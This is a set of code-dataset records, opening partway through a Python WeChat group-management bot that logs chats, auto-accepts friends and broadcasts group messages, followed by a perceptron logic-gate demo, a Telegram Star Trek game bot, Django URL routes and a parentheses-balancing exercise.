os.path.exists(self.friends_path):\n os.mkdir(self.friends_path)\n self.friends_pic_path = os.path.join(self.path, 'friends', 'pic')\n if not os.path.exists(self.friends_pic_path):\n os.mkdir(self.friends_pic_path)\n\n self.xiaoi = XiaoI(self.key, self.secret)\n self.xiaoyuer = xiaoyu.XiaoY()\n self.xiaodou = xiaodou.Xiaodou(self.xiaodou_key)\n\n self.send_me = 1\n\n def init_group_name(self):\n self.group__newcomer = []\n\n\n def login(self):\n self.bot = Bot(cache_path=True, console_qr=False)\n #self.bot.enable_puid()\n self.myself = self.bot.self\n try:\n self.friend = self.bot.friends().search(self.friend_name)[0]\n except:\n self.friend = self.bot.self\n \n #print self.bot.friends()\n #logger.info(self.bot.groups())\n #print self.bot.mps()\n\n def create_group_logfile(self):\n group = self.bot.groups(update=True)\n logger.info(group)\n for gs in group:\n group_name = hashlib.md5(gs.name.encode('utf-8')).hexdigest()[-8:]\n logger.info(gs)\n logger.info(group_name)\n log_file = os.path.join(self.path,group_name)\n if not os.path.exists(log_file):\n os.mkdir(log_file)\n \n\n def send_friend_msg(self,send_msg):\n logger.info(\"send message to beijing group\")\n self.torla = self.bot.groups().search(u'北京交友群')[0]\n self.torla.send(send_msg)\n def send_kevin_msg(self):\n now_time = time.asctime( time.localtime(time.time()) )\n self.kevin_m = self.bot.friends().search('Kevin')[0]\n self.kevin_m.send(now_time)\n\n def send_group_msg(self):\n now_time = datetime.datetime.now().strftime(\"%H:%M\")\n if now_time > '09:00' and now_time < '23:00':\n topic_f = open(\"material/topic.txt\",\"r\")\n comment = topic_f.readlines()\n comment_filter = []\n for co in comment:\n if not co.startswith('#'):\n comment_filter.append(co)\n #print len(comment_filter)\n one_topic = comment_filter[random.randint(0,len(comment_filter)-1)]\n \n self.group_jiaoyou = self.bot.groups().search(u'北京交友群')[0]\n #self.group_jiaoyou1 = self.bot.groups().search(u'测试专用群')[0]\n self.group_jiaoyou.send(one_topic)\n\n timer = threading.Timer(7200, self.send_group_msg)\n timer.start()\n\n def msg_from_friends(self):\n @self.bot.register(Friend)\n def msg_yy(msg):\n\n #create log file\n day = time.strftime(\"%Y-%m-%d\")\n file_name = '%s.txt' % ( day)\n file_ab_path = os.path.join(self.friends_path, file_name)\n create_time = msg.create_time.strftime('%Y-%m-%d %H:%M:%S')\n #pic_file = os.path.join(self.path,group_name,day)\n #if not os.path.exists(pic_file):\n #os.mkdir(pic_file)\n \n #ret_text, self.use_xiaoi = self.xiaoyuer.do_reply(msg,self.use_xiaoi)\n \n #微信web版无法邀请好友入群\n\n if msg.type == PICTURE:\n word_text = \"PICTURE:%s\" % ( msg.file_name) \n ct = msg.create_time.strftime('%Y-%m-%d-%H-%M-%S')\n msg.get_file('%s/%s-%s-%s' % (self.friends_pic_path,ct,random.randint(1,10),msg.file_name))\n #if msg.file_name.endswith(\".png\"):\n # new_friend = self.bot.friends().search(msg.sender.name)[0]\n # group_add = self.bot.groups().search(self.invite_group2)[0]\n # group_add.add_members(new_friend, use_invitation=True)\n #group_beijing = self.bot.groups().search(self.invite_group3)[0]\n #group_beijing.add_members(new_friend, use_invitation=True)\n\n elif msg.type == TEXT:\n word_text = msg.text\n '''\n print self.friends_accept\n #if self.friends_accept and (u'我通过了你的朋友验证请求' in msg.text or u\"现在我们可以开始聊天了\" in msg.text):\n if self.friends_accept and u'我通过了你的朋友验证请求' in msg.text:\n msg.reply('嗨,您好!欢迎你加入芊芊结北京单身群,为了保证群内良好的交流与互动,请进群后务必根据群要求修改群名片,并完成相应步骤,你才能更好脱单哦!!')\n new_friend = self.bot.friends().search(msg.sender.name)[0]\n group_add = self.bot.groups().search(self.invite_group1)[0]\n group_add.add_members(new_friend, use_invitation=True)\n msg.reply_raw_msg(\n raw_type=42,\n raw_content='') \n msg.reply(u'另外如若想进入其他北京地区单身群,需要做点小任务哦!将以下图片转发到朋友圈,并配上以下文字。完成后将截图发送给我即可。文字内容如下:')\n msg.reply(u\"”这个平台不错哦,群主也很靠谱,大家可以扫描加入,体验一下“\")\n msg.reply_image(\"material/welcome.jpg\")\n elif msg.text == u'入群' or msg.text == \"加群\":\n msg.reply('回复相应数字即可发送群邀请\\n1. 北京芊芊结1群\\n\\\n2. 北京芊芊 结C群\\n3. 缘来是你北京交友群\\n4. 机器人小鱼儿聊天群') \n elif msg.text == u'3':\n msg.reply('缘来是你北京交友群') \n new_friend = self.bot.friends().search(msg.sender.name)[0]\n group_beijing = self.bot.groups().search(u'北京交友群')[0]\n group_beijing.add_members(new_friend, use_invitation=True)\n elif msg.text == u'1':\n msg.reply('北京芊芊结1群') \n new_friend = self.bot.friends().search(msg.sender.name)[0]\n group_add = self.bot.groups().search(u'北京芊芊结1群')[0]\n group_add.add_members(new_friend, use_invitation=True)\n elif msg.text == u'4':\n msg.reply('机器人小鱼儿聊天群') \n new_friend = self.bot.friends().search(msg.sender.name)[0]\n group_add = self.bot.groups().search(u'机器人小鱼儿聊天群')[0]\n group_add.add_members(new_friend, use_invitation=True)\n elif msg.text == u'2':\n msg.reply('北京芊芊结C群') \n new_friend = self.bot.friends().search(msg.sender.name)[0]\n group_add = self.bot.groups().search(u'北京芊芊结C群')[0]\n group_add.add_members(new_friend, use_invitation=True)\n elif msg.text == u'5':\n msg.reply('北京芊芊结单身5群') \n new_friend = self.bot.friends().search(msg.sender.name)[0]\n group_add = self.bot.groups().search(u'北京芊芊结单身5群')[0]\n group_add.add_members(new_friend, use_invitation=True)\n \n '''\n #if msg.sender.name == 'Kevin':\n # try:\n # send_kevin =12\n # if send_kevin == 1:\n # msg.reply('Hello')\n #except Exception as e:\n # logger.error(e)\n #msg.reply(u'这话我没法接')\n\n if msg.text == u'你好':\n try:\n msg.reply(u'你好') \n except Exception as e:\n logger.error(e)\n word = \"%s %s:%s\\n\" % (create_time, msg.sender.name, word_text)\n with open(file_ab_path, \"a+\") as f:\n f.write(word.encode('utf-8'))\n word = None\n\n #处理公共号消息\n def my_mps(self):\n @self.bot.register(MP)\n def print_mp_msg(msg):\n #self.friend.send(msg)\n #self.friend.send_raw_msg( raw_content=msg.raw)\n #msg.forward(self.friend)\n \"\"\"\n if msg.type == SHARING and msg.sender.name == '爱净意':\n for article in msg.articles:\n if '第壹简报' in article.title:\n self.friend.send(article.title)\n self.friend.send(article.url)\n #article_url = 'https://mp.weixin.qq.com/s/5E_SGRmaDA9O1nZgjGG0mw'\n jb = jianbao.Get_Jianbao(article.url)\n jb_content = jb.out_jianbao()\n logger.info(jb_content)\n self.friend.send(jb_content)\n if msg.type == SHARING and msg.sender.name == '硕士博士俱乐部':\n for article in msg.articles:\n if '妹子篇' in article.title:\n self.friend.send(article.title)\n self.friend.send(article.url)\n if msg.type == SHARING and msg.sender.name == '硕博联谊':\n for article in msg.articles:\n if '妹子' in article.title and '现居北京' in article.title:\n self.friend.send(article.title)\n self.friend.send(article.url)\n \"\"\"\n if msg.type == SHARING and msg.sender.name == '简报微刊':\n for article in msg.articles:\n if '简报微刊' in article.title:\n #self.friend.send(article.title)\n #self.friend.send(article.url)\n jb = jianbao.Get_Jianbao(article.url)\n jb_content = jb.out_jianbao()\n self.jb_content = jb_content\n logger.info(jb_content)\n #self.friend.send(jb_content)\n\n for group_n in self.group_jianbao_list:\n try:\n my_group = self.bot.groups().search(group_n)[0]\n my_group.send(jb_content)\n except(IndexError,e):\n logger.error('%s not exists, please check it!' %val)\n if msg.type == SHARING and msg.sender.name == '第壹简报':\n for article in msg.articles:\n if '第壹简报' in article.title:\n #self.friend.send(article.title)\n #self.friend.send(article.url)\n _jb = diyi.Get_Jianbao(article.url)\n diyi_content = _jb.out_jianbao()\n self.diyi_content = diyi_content\n logger.info(diyi_content)\n #self.friend.send(jb_content)\n\n for group_n in self.group_jianbao_list:\n try:\n my_group = self.bot.groups().search(group_n)[0]\n my_group.send(diyi_content)\n except(IndexError,e):\n logger.error('%s not exists, please check it!' %val)\n\n\n def msg_from_friends_accept(self):\n @self.bot.register(msg_types=FRIENDS)\n def auto_accept_friends(msg):\n logger.info(\"enter accept\")\n #new_friend = self.bot.accept_friend(msg.card)\n new_friend = msg.card.accept()\n new_friend.send('嗨,您好!欢迎你加入芊芊结北京单身群,为了保证群内良好的交流与互动,请进群后务必根据群要求修改群名片,并完成相应步骤,你才能更好脱单哦!!')\n #msg.reply('欢迎加入北京芊芊结1群,加入更多群请回复:加群')\n #new_friend = self.bot.friends().search(msg.sender.name)[0]\n group_add = self.bot.groups().search(self.invite_group1)[0]\n group_add.add_members(new_friend, use_invitation=True)\n msg.reply_raw_msg(\n raw_type=42,\n raw_content='') \n new_friend.send('另外如若想进入其他北京地区单身群,需要做点小任务哦!将以下图片转发到朋友圈,并配上以下\\\n文字,完成后将截图发送给我即可。文字内容如下:')\n new_friend.send(u\"”这个平台不错哦,群主也很靠谱,大家可以扫描加入,体验一下“\")\n new_friend.send_image(\"material/welcome.jpg\")\n #logger.info(\"after accept\")\n \n #处理群消息\n def group_msg(self):\n #注册消息\n @self.bot.register(Group)\n def print_msg(msg):\n #日志文件创建\n group_name = hashlib.md5(msg.sender.name.encode('utf-8')).hexdigest()[-8:]\n my_group = self.bot.groups().search(msg.sender.name)[0]\n log_file = os.path.join(self.path,group_name)\n #print group_name\n day = time.strftime(\"%Y-%m-%d\")\n file_name = '%s.txt' % ( day)\n file_ab_path = os.path.join(log_file, file_name)\n #pic_file = 'log/%s-%s' % (group_zh_name,day)\n pic_file = os.path.join(self.path,group_name,day)\n if not os.path.exists(pic_file):\n os.mkdir(pic_file)\n \n create_time = msg.create_time.strftime('%Y-%m-%d %H:%M:%S')\n #name = msg.member.name\n name = msg.member.nick_name\n #群内有被at的消息就会智能回复,支持图灵和小i机器人,默认小i\n #print msg.is_at\n #print self.use_xiaoi\n #if msg.is_at and self.use_xiaoi == 1:\n myword = ''\n #消息处理,TEXT文本,SHARING链接,PICTURE图片,RECORDING语音,\n #ATTACHMENT附件,NOTE红包提示,新人入群提示,MAP地图\n #print PICTURE, VIDEO,RECORDING,ATTACHMENT\n if msg.type == TEXT:\n word = \"%s %s:%s\\n\" % (create_time, name, msg.text)\n if msg.is_at or msg.text.startswith(u'小鱼儿'):\n #tuling = Tuling(api_key=self.key)\n ret_text, self.use_xiaoi = self.xiaoyuer.do_reply(msg,self.use_xiaoi,my_group)\n \n #小豆机器人\n if ret_text == '1' and self.use_xiaoi == 1:\n ret_text = self.xiaodou.do_reply(msg)\n if ret_text == '2' and self.use_xiaoi == 1:\n ret_text = self.xiaoi.do_reply(msg)\n #ret_text = tuling.do_reply(msg)\n myword = \"%s %s:%s\\n\" % (create_time, self.myself.name, ret_text)\n \n elif msg.type == SHARING:\n #print msg\n word = \"%s %s:SHARING:%s\\n\" % (create_time, name, msg.text)\n \n elif msg.type in [PICTURE, VIDEO,RECORDING,ATTACHMENT]:\n ct = msg.create_time.strftime('%Y-%m-%d-%H-%M-%S')\n if msg.type == PICTURE:\n msg.get_file('%s/%s-%s-%s' % (pic_file,ct,random.randint(1,10),msg.file_name))\n word = \"%s %s:PICTURE:%s\\n\" % (create_time, name, msg.file_name)\n #elif msg.type == VIDEO:\n # msg.get_file('%s/%s-%s-%s' % (file_name,ct,name,msg.file_name))\n elif msg.type == RECORDING:\n #print name\n msg.get_file('%s/%s-%s-%s' % (pic_file,ct,name,msg.file_name))\n word = \"%s %s:RECORDING:%s\\n\" % (create_time, name, msg.file_name)\n elif msg.type == ATTACHMENT:\n #print msg.file_name\n msg.get_file('%s/%s-%s-%s' % (pic_file,ct,name,msg.file_name))\n word = \"%s %s:ATTACHMENT:%s\\n\" % (create_time, name, msg.file_name)\n elif msg.type == NOTE:\n #self.friend.send(word)\n if u'\\u6536\\u5230' in msg.text:\n #print 'red packages!!!!!!!!!!!!!!!!!!!!!!'\n self.friend.send('Red Package:%s' %(msg.sender.name))\n elif u'\\u9080\\u8bf7' in msg.text and self.newcomer == '1':\n if group_name in self.group_newcomer_list: \n new_name = msg.text.split('\"')[-2]\n new_name_1 = None\n elif group_name in self.group_newcomer_list1: \n #self.friend.send(self.group_newcomer_list1)\n new_name_1 = msg.text.split('\"')[-2]\n new_name = None\n elif u'\\u626b\\u63cf' in msg.text and self.newcomer == '1':\n if group_name in self.group_newcomer_list: \n new_name = msg.text.split('\"')[1]\n new_name_1 = None\n elif group_name in self.group_newcomer_list1: \n new_name = None\n new_name_1 = msg.text.split('\"')[1]\n else:\n new_name = new_name_1 = None\n \n if new_name:\n #newcomer_msg = \"\"\"@%s 欢迎新人进群交友聊天,请详细阅读群公告。\\n进群请修改备注:昵称-出生年-性别-职业(学生)-学历,如:\\n%s-90-男-IT-硕士\"\"\"% (new_name, new_name)\n newcomer_msg = \"@%s 欢迎新人入群!!\"% (new_name) + \"\\n\" + self.welcome_word\n msg.reply(newcomer_msg)\n elif new_name_1:\n newcomer_msg_1 = \"\"\"@%s 欢迎进群,快来跟我聊天吧!!!\"\"\"% (new_name_1)\n msg.reply(newcomer_msg_1)\n word = \"%s %s:NOTE:%s\\n\" % (create_time, name, msg.text)\n elif msg.type == CARD:\n word = \"%s %s:CARD:%s\\n\" % (create_time, name, msg.text)\n elif msg.type == MAP:\n word = \"%s %s:MAP:%s\\n\" % (create_time, name, msg.text)\n elif msg.type == SYSTEM:\n word = \"%s %s:SYSTEM:%s\\n\" % (create_time, name, msg.text)\n \n if word:\n with open(file_ab_path, \"a+\") as f:\n f.write(word.encode('utf-8'))\n if myword:\n f.write(myword.encode('utf-8'))\n word = None\n #msg.forward(self.friend)\n #记录日志\n def log_message(self,group_name, word):\n log_file = os.path.join(self.path,group_name)\n if not os.path.exists(log_file):\n os.mkdir(log_file)\n \n\n #日志文件创建\n day = time.strftime(\"%Y-%m-%d\")\n file_name = '%s.txt' % ( day)\n file_ab_path = os.path.join(log_file, file_name)\n pic_file = os.path.join(self.path,group_name,day)\n if not os.path.exists(pic_file):\n os.mkdir(pic_file)\n \n with open(file_ab_path, \"a+\") as f:\n f.write(word.encode('utf-8'))\n word = None\n\n\n #每10分钟检测一次离群人员\n def send_message(self):\n #self.group_note_list = [u'测试专用群']\n #print self.group_note_list\n for group_n in self.group_note_list:\n try:\n my_group = self.bot.groups().search(group_n)[0]\n except(IndexError,e):\n logger.error('%s not exists, please check it!' %group_n)\n continue\n\n #group_name = hashlib.md5(my_group.name.encode('utf-8')).hexdigest()[-8:]\n group_members = analyze.GroupMembers(self.path, my_group, self.friend) \n group_members.analyze_mem()\n timer = threading.Timer(600, self.send_message)\n timer.start()\n\n #使用schedule模块执行定时任务\n def use_sche(self):\n #if self.send_me == 1:\n #self.send_message()\n #schedule.every().day.at(\"17:17\").do(self.send_message)\n #schedule.every(10).minutes.do(self.send_message)\n schedule.every().day.at(\"08:00\").do(self.send_friend_msg,self.send_morning)\n #schedule.every().day.at(\"22:30\").do(self.send_friend_msg,self.send_night)\n #schedule.every().day.at(\"10:20\").do(self.send_friend_msg,u\"@all 休息一下吧,该喝水了!\")\n #schedule.every().day.at(\"11:30\").do(self.send_friend_msg,u\"@all 该吃午饭了!\")\n #schedule.every().day.at(\"13:00\").do(self.send_friend_msg,u\"@all 午休时间到!\")\n #schedule.every().day.at(\"16:00\").do(self.send_friend_msg,u\"@all 休息一下吧,该喝水了!\")\n \n while True:\n #self.myself.send('log out')\n if not self.bot.alive:\n logger.error('not login')\n self.main()\n break\n schedule.run_pending()\n time.sleep(10)\n \n\n #进入群聊接受消息 \n def run_task(self): \n #if self.friends_accept:\n #self.msg_from_friends_accept()\n self.msg_from_friends()\n self.create_group_logfile()\n #my_groups = []\n self.group_msg()\n\n while True:\n if not self.bot.alive:\n logger.info('not login')\n self.main()\n break\n time.sleep(10)\n \n #embed()\n #self.bot.join()\n \n def main(self):\n self.login()\n #threads = []\n if self.recev_mps == 1:\n t1 = threading.Thread(target=self.my_mps,args=())\n t1.setDaemon(True)\n t1.start()\n\n #timer = threading.Timer(1, self.send_message)\n #timer.start()\n # send topic \n #timer1 = threading.Timer(3600, self.send_group_msg)\n #timer1.start()\n t2 = threading.Thread(target=self.use_sche,args=())\n t2.setDaemon(True)\n t2.start()\n t3 = threading.Thread(target=self.run_task,args=())\n #t3.setDaemon(True)\n t3.start()\n\nif __name__ == \"__main__\":\n group_m = GroupMessage()\n group_m.main() \n\n","repo_name":"aijingyi/wechat-group","sub_path":"init/group.py","file_name":"group.py","file_ext":"py","file_size_in_byte":24992,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"75"} +{"seq_id":"41085630944","text":"import seaborn\nfrom sklearn.linear_model import Perceptron\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom itertools import product\n\ndata = [\n [0, 0],\n [0, 1],\n [1, 0],\n [1, 1]\n]\n\nlabels_AND = [0, 0, 0, 1]\nlabels_XOR = [0, 1, 1, 0]\nlabels_OR = [0, 1, 1, 1]\n\ndef visualise_gate(labels, name = \"\"):\n\n x = [point[0] for point in data]\n y = [point[1] for point in data]\n\n classifier = Perceptron(\n max_iter = 40\n )\n\n classifier.fit(data, labels)\n print(f\"{name} gate: \", classifier.score(data, labels))\n result = classifier.decision_function([[0, 0], [1, 1], [0.5, 0.5]])\n print(result)\n\n # make a heat map that reveals the decision boundary:\n # a list of 100 evenly spaced decimals between 0 and 1:\n x_values = y_values = np.linspace(0, 1, 100)\n point_grid = list(product(x_values, y_values))\n distances = classifier.decision_function(point_grid )\n abs_distances = np.abs(distances)\n distances_matrix = abs_distances.reshape((100, 100))\n\n plt.scatter(x, y, c = labels)\n plt.title(f\"{name} gate\")\n plt.show()\n\n heatmap = plt.pcolormesh(\n x_values,\n y_values,\n distances_matrix,\n shading='auto'\n )\n plt.colorbar(heatmap)\n plt.show()\n\nvisualise_gate(labels_AND, \"AND\") \nvisualise_gate(labels_XOR, \"XOR\") \nvisualise_gate(labels_OR, \"OR\") \n","repo_name":"lendoo73/Challenge-Project-of-CodeCademy","sub_path":"python/Build_Deep_Learning_Models_with_TensorFlow/Perceptron_Logic_Gates/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"75"} +{"seq_id":"7321313074","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nfrom collections import defaultdict\nimport datetime\nimport logging\nimport unicodedata\n\n# pip install python-telegram-bot\n# https://github.com/python-telegram-bot/python-telegram-bot\n# https://github.com/python-telegram-bot/python-telegram-bot/blob/master/examples/README.md\nfrom telegram.ext import Updater, CommandHandler, MessageHandler, Filters\n\nfrom startrek_fsm import TrekGame\n\nCONTACTLIST_FN = 'startrekbot_contacts.tsv'\nBOT_KEY = \"PUT HERE API KEY\";\n\ndef load_contacts(fn=None):\n\tif fn is None: fn = CONTACTLIST_FN\n\tcontacts = set()\n\ttry:\n\t\tfor l in open(fn):\n\t\t\tz = l.strip()\n\t\t\tcontacts.add(z)\n\texcept:\n\t\treturn set()\n\treturn contacts\n\ndef save_contacts(contacts,fn=None):\n\tif fn is None: fn = CONTACTLIST_FN\n\tfh = open(fn,\"w+\")\n\tfor k in contacts:\n\t\tprint >>fh,str(k)\n\tfh.close()\n\ndef update_contacts(contacts,uu,fn=None):\n\tcontacts.add(uu)\n\tsave_contacts(contacts)\n\treturn contacts\n\ndef bot_error(bot, update, error):\n logging.warn('BOT\\tUpdate \"%s\" caused error \"%s\"' % (update, error))\n\ndef send_msg(bot,contact,msg,mono=True):\n\tif mono:\n\t\tmsg = u\"```\\n\"+msg+u\"\\n```\"\n\tbot.sendMessage(contact, text=msg, parse_mode=\"Markdown\", disable_web_page_preview=True)\n\ndef help_handler(bot, update):\n\tuu = update.message.chat_id\n\tlogging.info(\"USER\\tServe user '%s' with command '/help'\" % (str(uu),) )\n\tsend_msg(bot,uu,\"As a captain of the Enterprise, you should to fly through the galaxy and hunt down a number of Klingon ships. Each game starts with a different number of Klingons, friendly starbases and stars, spread throughout the galaxy.\",False)\n\tsend_msg(bot,uu,\"The galaxy map is arranged as an 8 by 8 grid of quadrants. Each quadrant is further divided into an 8 by 8 grid of sectors. The Enterprise's local surroundings can seen on a text-based map of the current quadrant's sectors.\",False)\n\tsend_msg(bot,uu,\"Stars were represented with a `*`, Klingon ships as a `>!<`, star bases as an ``, and the Enterprise itself with an `-O-`.\",False)\n\tsend_msg(bot,uu,\"The user can also use the long-range scan, LRS, to print out an abbreviated map of the quadrants lying directly around the Enterprise, listing the number of stars, Klingons and starbases in each quadrant.\",False)\n\tsend_msg(bot,uu,\"Klingon ships can be attacked with either phasers or photon torpedos. Phasers do not have to be aimed, but their power falls off with distance, requiring the player to estimate how much power to put into each shot. Also phasers can affect the Enterprise's shields.\",False)\n\tsend_msg(bot,uu,\"Torpedoes do not suffer this drop in power and will destroy a Klingon ship with a single hit, but they have to be aimed using polar coordinates, so misses are possible. Movement, combat and shields all drain the energy supply of the Enterprise, which can be topped up again by flying to a starbase. In case the Enterprise is low on energy or torpedoes, the player could warp to a starbase to refuel and repair.\",False)\n\tsend_msg(bot,uu,\"The game ends when the Enterprise is destroyed or all Klingons are destroyed.\\n\\nUse these digits to specify the direction for the movement/combat:\\n\\n\",False)\n\tsend_msg(bot,uu,\" 7 8 9\\n \\\\|/ \\n 4-o-6\\n /|\\\\ \\n 1 2 3\\n\\n\")\n\tsend_msg(bot,uu,\"Press /start to start a new game. Use /help to read this info again and /about to get a short story about original game.\",False)\n\ndef about_handler(bot, update):\n\tuu = update.message.chat_id\n\tlogging.info(\"USER\\tServe user '%s' with command '/about'\" % (str(uu),) )\n\tsend_msg(bot,uu,\" _____________ ___ \\n / __/_ __/ _ | / _ \\\\\\n _\\ \\ / / / __ |/ , _/\\n/___/ /_/ /_/ |_/_/|_| \\n _________ ______ __\\n /_ __/ _ \\/ __/ //_/\\n / / / , _/ _// ,< \\n /_/ /_/|_/___/_/|_| \\n\")\n\tsend_msg(bot,uu,\"Star Trek is a text-based computer game that puts the player in command of the USS Enterprise on a mission to hunt down and destroy an invading fleet of Klingon warships.\\n\",False)\n\tsend_msg(bot,uu,\"Trek developed out of a brainstorming session between Mike Mayfield and several high school friends in 1971. The original Star Trek television show had only recently ended its run and was still extremely popular. \",False)\n\tsend_msg(bot,uu,\"Mayfield and his \\\"geek friends\\\" wrote down a number of ideas for a game, and during the summer holidays he then started incorporating as many of them as he could on an SDS Sigma 7, using an illicitly borrowed account at the University of California, Irvine.\\n\\nThe original Sigma 7 version, and its descendants, were ported or copied to a wide variety of platforms. Several years later a lot of microcomputer versions appeared and were widely available and modified.\\n\\nStar Trek was reviewed in The Dragon magazine #38. Reviewer Mark Herro described the game in 1980 as \\\"one of the most popular (if not the most popular) computer games around.\\\"\",False)\n\tsend_msg(bot,uu,\"This telegram version was built by [altsoph](http://altsoph.com) based on [a Python port](https://github.com/psychotimmy/trek-game) of the original game by [Tim Holyoake](http://www.tenpencepiece.net/).\\nThanks to Evgeny Vasin and Ivan Yamshchikov for beta-testing.\",False)\n\tsend_msg(bot,uu,\"_____________ _\\n\\\\_(=====/_=_/___.--'-`--.__\\n \\\\ \\\\ `,--,-.__.---'\\n .--`\\\\\\\\--'../\\n '---._____.|]\\n\\n ...dif-tor heh smusma...\\n\")\n\tsend_msg(bot,uu,\"\\nPress /start to start a new game. Use /help to read about controls and /about to get this info again.\",False)\n\ndef start_handler(bot, update):\n\t[fsm_objects,contacts] = bot.alt_data\n\tuu = update.message.chat_id\n\tif uu not in contacts: contacts = update_contacts(contacts,uu)\n\tlogging.info(\"USER\\tInit user '%s'\" % (str(uu),) )\n\tfsm_objects[uu] = TrekGame()\n\tfsm_objects[uu].step()\n\tsend_msg(bot,uu,fsm_objects[uu].result())\n\tbot.alt_data = [fsm_objects,contacts]\n\ndef command_handler(bot, update):\n\t[fsm_objects,contacts] = bot.alt_data\n\tuu = update.message.chat_id\n\tm = update.message.text\n\tif uu not in contacts: contacts = update_contacts(contacts,uu)\n\tif uu not in fsm_objects:\n\t\tstart_handler(bot,update)\n\t\treturn\n\n\tprev_state = fsm_objects[uu].get_state()\n\tfsm_objects[uu].step(m)\n\tif fsm_objects[uu].get_state() == 'main_cmd':\n\t\tfsm_objects[uu].step(clear = False)\n\tsend_msg(bot,uu,fsm_objects[uu].result())\n\tescm = \"\".join(ch if unicodedata.category(ch)[0]!=\"C\" else \" \" for ch in m[:min(len(m),128)])\n\tlogging.info(\"USER\\tUser`s '%s' command received: '%s'. State changed from '%s' to '%s'\" % (str(uu),escm,prev_state,fsm_objects[uu].get_state()) )\n\tbot.alt_data = [fsm_objects,contacts]\n\ndef main():\n\tfsm_objects = dict()\n\tcontacts = load_contacts()\n\n\tlogging.basicConfig(filename='startrekbot_%s.log' % (datetime.datetime.now().strftime(\"%Y%m%d%H%M%S\"),), \n\t\t\t\t\t\tformat='%(asctime)s\\t%(levelname)s\\t%(message)s', datefmt='%Y-%m-%d %H:%M:%S', level=logging.INFO)\n\tlogging.info('STATUS\\tStarted') \n\tlogging.info('STATUS\\t%d contacts found' %(len(contacts,)))\n\n\t# Create the EventHandler and pass it your bot's token.\n\tupdater = Updater(BOT_KEY)\n\tupdater.bot.alt_data = [fsm_objects,contacts]\n\t# updater.bot.alt_data = [fsm_states,fsm_objects,contacts]\n\tdp = updater.dispatcher\n\n\t# on different commands - answer in Telegram\n\tdp.add_handler(CommandHandler(\"start\", start_handler))\n\tdp.add_handler(CommandHandler(\"help\", help_handler))\n\tdp.add_handler(CommandHandler(\"about\", about_handler))\n\t# on noncommand i.e message - echo the message on Telegram\n\tdp.add_handler(MessageHandler([Filters.text], command_handler))\n\t# log all errors\n\tdp.add_error_handler(bot_error)\n\t# Start the Bot\n\tupdater.start_polling(poll_interval=0.2)\n\t# Run the bot until the you presses Ctrl-C or the process receives SIGINT,\n\t# SIGTERM or SIGABRT. This should be used most of the time, since\n\t# start_polling() is non-blocking and will stop the bot gracefully.\n\tupdater.idle()\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"altsoph/startrek_game_telegram_bot","sub_path":"startrek_dispatcher_botlib.py","file_name":"startrek_dispatcher_botlib.py","file_ext":"py","file_size_in_byte":7866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"18513719740","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.ShowMainView.as_view(), name='main_page'),\n path('biografi//', views.BioDetailView.as_view(), name='full_biografi'),\n path('main_news//', views.MainNewsDetailView.as_view(), name='full_main_news'),\n path('user//', views.ShowUserNews.as_view(), name='user_all_news'),\n path('news//', views.NewsDetailView.as_view(), name='full_news'),\n path('news//update/', views.UpdateNewsView.as_view(), name='update_news'),\n path('news/add/', views.CreateNewsView.as_view(), name='add_news'),\n path('news//delete/', views.DeleteNewsView.as_view(), name='delete_news'),\n path('news/', views.ShowNewsView.as_view(), name='news'),\n path('api/news/', views.ApiNewsView.as_view()),\n path('api/news//', views.ApiNewsDetailView.as_view()),\n\n]\n","repo_name":"geihar/django","sub_path":"main_page/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"24868129351","text":"'''\r\nGiven a parentheses string s containing only the characters '(' and ')'. A parentheses string is balanced if:\r\n\r\nAny left parenthesis '(' must have a corresponding two consecutive right parenthesis '))'.\r\nLeft parenthesis '(' must go before the corresponding two consecutive right parenthesis '))'.\r\nIn other words, we treat '(' as openning parenthesis and '))' as closing parenthesis.\r\n\r\nFor example, \"())\", \"())(())))\" and \"(())())))\" are balanced, \")()\", \"()))\" and \"(()))\" are not balanced.\r\n\r\nYou can insert the characters '(' and ')' at any position of the string to balance it if needed.\r\n\r\nReturn the minimum number of insertions needed to make s balanced.\r\n'''\r\n\r\ndef min_insertions_1(string):\r\n stack = []\r\n opening, closing = '(]'\r\n\r\n # Pre-processing\r\n insertion_cnt = 0\r\n string = string.replace('))', closing)\r\n insertion_cnt += string.count(')')\r\n string = string.replace(')', closing)\r\n\r\n\r\n for idx, ch in enumerate(string):\r\n if ch == opening:\r\n stack += idx,\r\n elif ch == closing:\r\n if not stack:\r\n insertion_cnt += 1\r\n else:\r\n stack.pop()\r\n\r\n insertion_cnt += (len(stack)*2)\r\n return insertion_cnt\r\n\r\n\r\ndef min_insertions_2(string):\r\n opening, closing = '()'\r\n required = right = 0\r\n for ch in string:\r\n if ch == opening:\r\n if right % 2:\r\n right -= 1\r\n required += 1\r\n right += 2\r\n elif ch == closing:\r\n right -= 1\r\n if right < 0:\r\n right += 2\r\n required += 1\r\n return required + right\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n # approach 1\r\n assert min_insertions_1('(()))') == 1\r\n assert min_insertions_1('())') == 0\r\n assert min_insertions_1('))())(') == 3\r\n assert min_insertions_1('((((((') == 12\r\n assert min_insertions_1(')))))))') == 5\r\n\r\n # approach 2\r\n assert min_insertions_2('(()))') == 1\r\n assert min_insertions_2('())') == 0\r\n assert min_insertions_2('))())(') == 3\r\n assert min_insertions_2('((((((') == 12\r\n assert min_insertions_2(')))))))') == 5\r\n","repo_name":"royadityak94/InterviewPrep","sub_path":"Grokking/Parantheses_Problems/1541_min_insertions_special_parantheses.py","file_name":"1541_min_insertions_special_parantheses.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"2692799549","text":"# encoding: utf-8\nimport torch\nclasses_num = 0\nindices = [[]]\nbraid_indices = [[]]\nbatch_size = None\n\n\ndef parse_target(target):\n \"\"\"each element of target ranges from 0. to (classes_num-1)\"\"\"\n global classes_num, indices, braid_indices, batch_size\n\n if isinstance(target, list):\n 